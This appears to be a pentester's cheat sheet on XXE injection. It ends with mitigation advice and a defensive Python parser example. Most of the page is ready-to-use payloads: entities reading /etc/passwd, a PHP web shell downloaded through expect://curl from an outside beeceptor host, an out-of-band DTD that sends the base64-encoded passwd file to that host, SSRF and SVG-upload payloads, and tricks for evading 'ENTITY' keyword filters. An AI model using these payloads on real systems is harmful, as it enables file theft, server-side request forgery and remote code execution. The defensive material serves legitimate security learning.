
XML external entity (XXE) injection

https://app.beeceptor.com/


Last updated 8 months ago

Identifying

  1. Identify XML User Input: Look for web pages or forms that accept XML input from users. This can include forms that submit data in XML format to the server.

  2. Inspect Input Filtering and Sanitization: Check if the application applies proper input filtering or sanitization to XML input. Lack of filtering or sanitization increases the risk of XXE vulnerabilities.

  3. Observe Response Handling: Pay attention to how the application handles user input in the response. If the application reflects XML elements back to the user without encoding, it may be vulnerable to XXE.

  4. Analyze DTD Declaration: Determine if the XML input includes a Document Type Definition (DTD) declaration. If present, it may allow for entity declaration and expansion, leading to XXE.

  5. Add Custom Entity: Inject a custom entity into the XML input to test for XXE. This can be done by adding a DTD declaration and defining a new entity within it.

  6. Test Entity Replacement: Verify if the application replaces the custom entity with its defined value in the response. If the value of the entity is reflected back, it indicates potential XXE vulnerability.

  7. Check Content-Type: Even if the application primarily uses JSON format, try changing the Content-Type header to application/XML. Some applications may accept XML data even if they primarily handle JSON.

  8. Convert JSON to XML: If necessary, convert JSON data to XML format using online tools. Submit the XML data to the application and test for XXE vulnerabilities as described above.

Error Based XXE

Read File

<!--Linux -->
<?xml version="1.0"?>
<!DOCTYPE hacktor [<!ENTITY read  SYSTEM "file:///etc/passwd">]>
<check>
    <proid>&read;</proid>
</check>

Blind Data Exfiltration

PHP Filter

<?xml version="1.0"?>
<!DOCTYPE hacktor [<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=/index.php"> ]>
<Check><proid>&read;</proid></Check>

Code Execution

PHP wrapper: expect://ls

echo '<?php system($_REQUEST["cmd"]); ?>' > shell.php
# serve the file over HTTP
python3 -m http.server 80

To execute it, send:

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'https://h3ckt00r.free.beeceptor.com/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

The expect module is not enabled/installed on modern PHP servers by default, so this attack may not always work.

SSRF Attack

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://sub.vulnerable.com/admin"> ]>
<stockCheck>
    <productId>&xxe;</productId>
    <storeId>1</storeId>
</stockCheck>

CDATA with XXE and SSRF

<?xml version="1.0"?>
<!DOCTYPE hacktor [ <!ENTITY read SYSTEM "https://h3ckt00r.free.beeceptor.com">]>
<root>
    <data><![CDATA[&read;]]></data>
</root>

File Upload

<!-- exploit.svg -->

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>

<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">

  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Out-of-Band (OOB)

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY % read SYSTEM "https://h3ckt00r.free.beeceptor.com/xxe.dtd" > ]>

Hosted on the attacker-controlled server as xxe.dtd:

<!DOCTYPE h3ckt00r [ <!ENTITY % read SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/passwd" > ]>
<!ENTITY % test "<!ENTITY &#x25; sendfile SYSTEM 'https://h3ckt00r.free.beeceptor.com/?x=%read;'>">
%test;
%sendfile;

Automated OOB Exfiltration

0xN1ghtM4r3@htb[/htb]$ ruby XXEinjector.rb --host=127.0.0.1 --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter

...SNIP...
[+] Sending a request with malicious XML.
[+] Responding with XML for: /etc/passwd
[+] Retrieved data:

How to Find XXE

  • XML file upload (e.g. config files)

  • XML input fields

  • XML-based APIs

  • XML-based files (RSS, SVG)

How to bypass filters that block the "ENTITY" keyword

Case 1: Case manipulation (uppercase/lowercase)

<!eNtItY h3ckt00r SYSTEM "file:///etc/passwd">

Case 2: Encoding

  • HTML encoding:

<!&#69;NTITY h3ckt00r SYSTEM "file:///etc/passwd">
<!-- e -> &#69; -->
  • Hexadecimal encoding

<!&#x45;NTITY h3ckt00r SYSTEM "file:///etc/passwd">
<!-- e -> &#x45; -->
  • Whitespace bypasses (extra spaces or newlines), or using a comment

<!EN TITY h3ckt00r SYSTEM "file:///etc/passwd">
<!-- OR --> 
<!EN
TITY h3ckt00r SYSTEM "file:///etc/passwd">
<!-- OR using Comment -->
<!E<!-- Comment -->NTITY xxe SYSTEM "file:///etc/passwd">
  • CDATA

<!DOCTYPE root [
  <!ENTITY % data "<![CDATA[ENTITY]]>">
  %data;
]>

How to Test: XXE Methodology

  1. Find the XXE data entry point.

  2. Change the XML object to anything.

  3. Try to declare a reference entity or a parameter entity, e.g. <!DOCTYPE hacktor [ <!ENTITY xxe SYSTEM "Hello">]>

  4. Test blind XXE: set up a listening server and add an external reference pointing at it.

  5. If the input is not in XML format, test XInclude.

Mitigation and Prevention

  • Avoiding Outdated Components

  • Using Safe XML Configurations

    • Disable referencing custom Document Type Definitions (DTDs)

    • Disable referencing External XML Entities

    • Disable Parameter Entity processing, e.g. in PHP:

      • libxml_disable_entity_loader(true);
    • Disable support for XInclude

    • Prevent Entity Reference Loops
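Added example, not code from this page: a Python script showing why the "ENTITY"-keyword filter from the bypass section fails against the listed variants, and how the safe configuration above (no DTD, no external entities, no parameter entities) rejects all of them at the parser, using only the standard-library expat binding; the sample request bodies are constructed here.

```python
from xml.parsers import expat

# Constructed sample request bodies: the plain payload from this page, the
# "ENTITY"-keyword evasions listed in the bypass section, and one benign
# document. Entity and element names (hacktor, read, check, proid) are the page's.
SAMPLES = {
    "plain":   '<!DOCTYPE hacktor [<!ENTITY read SYSTEM "file:///etc/passwd">]>'
               '<check><proid>&read;</proid></check>',
    "case":    '<!DOCTYPE hacktor [<!eNtItY read SYSTEM "file:///etc/passwd">]>'
               '<check><proid>&read;</proid></check>',
    "charref": '<!DOCTYPE hacktor [<!&#69;NTITY read SYSTEM "file:///etc/passwd">]>'
               '<check><proid>&read;</proid></check>',
    "split":   '<!DOCTYPE hacktor [<!EN\nTITY read SYSTEM "file:///etc/passwd">]>'
               '<check><proid>&read;</proid></check>',
    "benign":  '<?xml version="1.0"?><check><proid>123</proid></check>',
}

def naive_filter_accepts(body: str) -> bool:
    """The keyword filter the bypass section defeats: blocks only an exact 'ENTITY'."""
    return "ENTITY" not in body

def parse_hardened(body: str) -> dict:
    """Parse with the DTD mechanism switched off: any DOCTYPE is rejected before its
    internal subset is read, so how 'ENTITY' is spelled never matters.
    Returns an {element: text} map of the parsed document."""
    parser = expat.ParserCreate()
    # never read external parameter entities (the OOB / blind technique above)
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError(f"DOCTYPE {name!r} not allowed")
    parser.StartDoctypeDeclHandler = forbid_doctype
    # defence in depth: returning 0 makes expat fail instead of fetching an external entity
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    fields, stack = {}, []
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()
    def on_text(data):
        if stack:
            fields[stack[-1]] = fields.get(stack[-1], "") + data
    parser.CharacterDataHandler = on_text
    parser.Parse(body, True)
    return fields

def evaluate(body: str) -> tuple:
    """(naive filter accepts?, hardened parser result or 'rejected: ...') for one body."""
    try:
        result = parse_hardened(body)
    except (ValueError, expat.ExpatError) as exc:
        result = f"rejected: {exc}"
    return naive_filter_accepts(body), result

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        accepted, outcome = evaluate(body)
        print(f"{label:8} naive_accepts={accepted!s:5} hardened={outcome}")
```

The PHP call listed above, libxml_disable_entity_loader(), is deprecated as of PHP 8.0 because libxml 2.9 and later no longer load external entities unless the caller asks for it; the equivalent there is to parse without the LIBXML_NOENT and LIBXML_DTDLOAD options.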